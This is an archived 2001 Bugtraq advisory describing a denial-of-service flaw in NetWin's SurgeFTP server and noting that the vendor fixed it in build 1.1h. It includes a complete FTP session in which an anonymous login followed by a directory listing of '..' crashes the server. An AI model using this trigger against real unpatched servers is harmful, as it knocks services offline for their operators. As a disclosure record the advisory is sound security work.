Date: Thu, 1 Mar 2001 00:16:53 +0100 From: SNS Research <vuln-dev@GREYHACK.COM> Subject: SurgeFTP Denial of Service To: BUGTRAQ@SECURITYFOCUS.COM Strumpf Noir Society Advisories ! Public release ! <--# -= SurgeFTP Denial of Service =- Release date: Thursday, March 1, 2001 Introduction: NetWin's SurgeFTP is an easy to manage and reliable FTP server with detailed reporting and easy to use management features. SurgeFTP is available for both the Unix/Linux and Windows flavours of operating systems from the vendor's site: http://www.netwinsite.com Problem: Due to a design issue in the SurgeFTP server a denial of service condition exists in it which could allow any user with local or shell access to the host to crash the server. The problem resides in the local handling of the directory listing command, which after first being successfully initialized will die if followed by a "malformed" request. Example: # ftp localhost Connected to testbak 220 SurgeFTP testbak (Version 1.0b) User (testbak:(none)): anonymous 331 Password required for anonymous. Password: 230- Alias Real path Access 230- / /home read 230 User anonymous logged in. ftp> ls / 200 Port command successful. 150 Opening ASCII mode data connection for file list. (/) 226 Transfer complete. ftp> ls .. 200 Port command successful. 150 Opening ASCII mode data connection for file list. (/..) -> ftp get:Connection reset by peer (..) Solution: Vendor has been notified and has verified the problem. Build v1.1h has been released, which fixes this issue. It's available from ftp://ftp.netwinsite.com/pub/surgeftp/ yadayadayada Free sk8! (http://www.freesk8.org) SNS Research is rfpolicy (http://www.wiretrip.net/rfp/policy.html) compliant, all information is provided on AS IS basis. EOF, but Strumpf Noir Society will return!